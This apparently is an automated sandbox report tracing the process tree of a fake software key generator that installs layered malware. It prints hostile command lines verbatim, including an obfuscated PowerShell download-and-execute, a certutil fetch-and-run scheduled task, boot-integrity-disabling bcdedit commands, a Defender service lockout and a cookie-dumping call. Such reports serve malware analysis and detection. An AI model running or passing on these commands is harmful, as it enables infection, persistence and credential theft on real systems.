PID 3360 wrote to memory of 1320	3360	keygen-step-4.exe	93
PID 3360 wrote to memory of 1320	3360	keygen-step-4.exe	93
PID 1320 wrote to memory of 3692	1320	askinstall20.exe	95
PID 1320 wrote to memory of 3692	1320	askinstall20.exe	95
PID 1320 wrote to memory of 3692	1320	askinstall20.exe	95
PID 3692 wrote to memory of 4116	3692	cmd.exe	97
PID 3692 wrote to memory of 4116	3692	cmd.exe	97
PID 3692 wrote to memory of 4116	3692	cmd.exe	97
PID 3360 wrote to memory of 4268	3360	keygen-step-4.exe	100
PID 3360 wrote to memory of 4268	3360	keygen-step-4.exe	100
PID 3360 wrote to memory of 4268	3360	keygen-step-4.exe	100
PID 3548 wrote to memory of 4416	3548	multitimer.exe	101
PID 3548 wrote to memory of 4416	3548	multitimer.exe	101
PID 4268 wrote to memory of 4480	4268	file.exe	102
PID 4268 wrote to memory of 4480	4268	file.exe	102
PID 4268 wrote to memory of 4480	4268	file.exe	102
PID 4416 wrote to memory of 4524	4416	multitimer.exe	103
PID 4416 wrote to memory of 4524	4416	multitimer.exe	103
PID 4480 wrote to memory of 4600	4480	6A97.tmp.exe	104
PID 4480 wrote to memory of 4600	4480	6A97.tmp.exe	104

C:\Users\Admin\AppData\Local\Temp\Easefab_Video_Converter_5_2_key_code_generator_by_ViKiNG.exe
"C:\Users\Admin\AppData\Local\Temp\Easefab_Video_Converter_5_2_key_code_generator_by_ViKiNG.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:196
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2052
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:1312
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:64
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:8
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3504
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:3944
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4064
    - - C:\Users\Admin\AppData\Local\Temp\FU8819PNUA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FU8819PNUA\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3548
      - C:\Users\Admin\AppData\Local\Temp\FU8819PNUA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FU8819PNUA\multitimer.exe" 1 3.1615959302.605195064eecf 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\FU8819PNUA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FU8819PNUA\multitimer.exe" 2 3.1615959302.605195064eecf
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4524
        
        C:\Users\Admin\AppData\Local\Temp\slsvj43sfah\tuwun4c3xvz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slsvj43sfah\tuwun4c3xvz.exe" testparams
        8⤵
        Executes dropped EXE
        
        PID:4764
        
        C:\Users\Admin\AppData\Roaming\cseaz4kjohk\rubntndbxig.exe
        
        "C:\Users\Admin\AppData\Roaming\cseaz4kjohk\rubntndbxig.exe" /VERYSILENT /p=testparams
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\is-0LP48.tmp\rubntndbxig.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0LP48.tmp\rubntndbxig.tmp" /SL5="$601E8,364515,58368,C:\Users\Admin\AppData\Roaming\cseaz4kjohk\rubntndbxig.exe" /VERYSILENT /p=testparams
        10⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\shyq1jahaox\p40qzszkupa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\shyq1jahaox\p40qzszkupa.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\is-UU5LD.tmp\p40qzszkupa.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UU5LD.tmp\p40qzszkupa.tmp" /SL5="$301EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\shyq1jahaox\p40qzszkupa.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\is-1HL5K.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1HL5K.tmp\winlthst.exe" test1 test1
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\QbfCCamg6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QbfCCamg6.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5656
        
        C:\Users\Admin\AppData\Local\Temp\QbfCCamg6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QbfCCamg6.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5128
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\ljdyxadaml5\enoflseyeow.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ljdyxadaml5\enoflseyeow.exe" 57a764d042bf8
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:4848
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\UJ1IDMLY3E\UJ1IDMLY3.exe" 57a764d042bf8 & exit
        9⤵
        
        PID:4504
        
        C:\Program Files\UJ1IDMLY3E\UJ1IDMLY3.exe
        
        "C:\Program Files\UJ1IDMLY3E\UJ1IDMLY3.exe" 57a764d042bf8
        10⤵
        Executes dropped EXE
        Checks computer location settings
        Adds Run key to start application
        
        PID:940
        
        C:\Users\Admin\AppData\Local\Temp\exvzt3ypcmp\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\exvzt3ypcmp\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\is-KKSDS.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KKSDS.tmp\vict.tmp" /SL5="$40204,870426,780800,C:\Users\Admin\AppData\Local\Temp\exvzt3ypcmp\vict.exe" /VERYSILENT /id=535
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\12xyskoe1d2\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\12xyskoe1d2\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\is-RQ9HT.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RQ9HT.tmp\Setup3310.tmp" /SL5="$301FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\12xyskoe1d2\Setup3310.exe" /Verysilent /subid=577
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\is-KM7OB.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KM7OB.tmp\Setup.exe" /Verysilent
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\is-M0V2I.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M0V2I.tmp\Setup.tmp" /SL5="$302AE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KM7OB.tmp\Setup.exe" /Verysilent
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\Delta.exe" /Verysilent
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\is-R2LFP.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R2LFP.tmp\Delta.tmp" /SL5="$2041A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\Delta.exe" /Verysilent
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5576
        
        C:\Users\Admin\AppData\Local\Temp\is-61PQJ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-61PQJ.tmp\Setup.exe" /VERYSILENT
        14⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:4492
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-61PQJ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        15⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        16⤵
        Kills process with taskkill
        
        PID:5572
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        16⤵
        Delays execution with timeout.exe
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\PictureLAb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\PictureLAb.exe" /Verysilent
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\is-HL2RC.tmp\PictureLAb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HL2RC.tmp\PictureLAb.tmp" /SL5="$3041A,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\PictureLAb.exe" /Verysilent
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\is-8D9P4.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8D9P4.tmp\Setup.exe" /VERYSILENT
        14⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\is-BA5Q4.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BA5Q4.tmp\Setup.tmp" /SL5="$50334,568550,484864,C:\Users\Admin\AppData\Local\Temp\is-8D9P4.tmp\Setup.exe" /VERYSILENT
        15⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\is-Q5ITS.tmp\RAsh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q5ITS.tmp\RAsh.exe" /S /UID=lab214
        16⤵
        Drops file in Drivers directory
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:4900
        
        C:\Program Files\Windows Multimedia Platform\YQMCSTWBWI\prolab.exe
        
        "C:\Program Files\Windows Multimedia Platform\YQMCSTWBWI\prolab.exe" /VERYSILENT
        17⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\is-JGV4Q.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JGV4Q.tmp\prolab.tmp" /SL5="$40248,575243,216576,C:\Program Files\Windows Multimedia Platform\YQMCSTWBWI\prolab.exe" /VERYSILENT
        18⤵
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-I3SPO.tmp\hjjgaa.exe" /Verysilent
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:8136
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\3jnnlccf0jz\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3jnnlccf0jz\AwesomePoolU1.exe"
        8⤵
        Executes dropped EXE
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\jgubvb1vuwj\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jgubvb1vuwj\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\is-9KCF9.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9KCF9.tmp\vpn.tmp" /SL5="$20248,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jgubvb1vuwj\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Modifies registry class
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4280
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:1376
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:5144
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5432
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        
        PID:5548
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:5960
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\vjenh5tjpit\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vjenh5tjpit\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\is-5KAFB.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5KAFB.tmp\IBInstaller_97039.tmp" /SL5="$1031E,14592896,721408,C:\Users\Admin\AppData\Local\Temp\vjenh5tjpit\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\is-OKLFF.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OKLFF.tmp\{app}\chrome_proxy.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4384
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-OKLFF.tmp\{app}\chrome_proxy.exe"
        11⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        12⤵
        Runs ping.exe
        
        PID:4164
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        10⤵
        Checks computer location settings
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\zgh2ocor1xg\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zgh2ocor1xg\app.exe" /8-23
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:4436
        
        C:\Program Files (x86)\Shy-Thunder\7za.exe
        
        "C:\Program Files (x86)\Shy-Thunder\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:2528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Shy-Thunder\app.exe" -map "C:\Program Files (x86)\Shy-Thunder\WinmonProcessMonitor.sys""
        9⤵
        
        PID:5740
        
        C:\Program Files (x86)\Shy-Thunder\app.exe
        
        "C:\Program Files (x86)\Shy-Thunder\app.exe" -map "C:\Program Files (x86)\Shy-Thunder\WinmonProcessMonitor.sys"
        10⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: LoadsDriver
        
        PID:5992
        
        C:\Program Files (x86)\Shy-Thunder\7za.exe
        
        "C:\Program Files (x86)\Shy-Thunder\7za.exe" e -p154.61.71.51 winamp.7z
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3972
        
        C:\Program Files (x86)\Shy-Thunder\app.exe
        
        "C:\Program Files (x86)\Shy-Thunder\app.exe" /8-23
        9⤵
        Executes dropped EXE
        
        PID:5448
        
        C:\Program Files (x86)\Shy-Thunder\app.exe
        
        "C:\Program Files (x86)\Shy-Thunder\app.exe" /8-23
        10⤵
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:1816
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        11⤵
        
        PID:3960
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        12⤵
        Modifies data under HKEY_USERS
        
        PID:5232
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-23
        11⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:2108
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        12⤵
        Creates scheduled task(s)
        
        PID:5268
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        12⤵
        Creates scheduled task(s)
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1120
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:4748
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6100
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5920
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:1908
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:4548
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5556
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5440
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6040
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:4224
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:3628
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5436
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:2244
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:4284
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:2484
        
        C:\Windows\System32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:3184
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        12⤵
        Drops file in Drivers directory
        
        PID:2276
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        12⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        13⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        14⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\csrss\r20210209.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\r20210209.exe
        12⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        12⤵
        Modifies data under HKEY_USERS
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        12⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
        13⤵
        
        PID:5280
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        12⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        
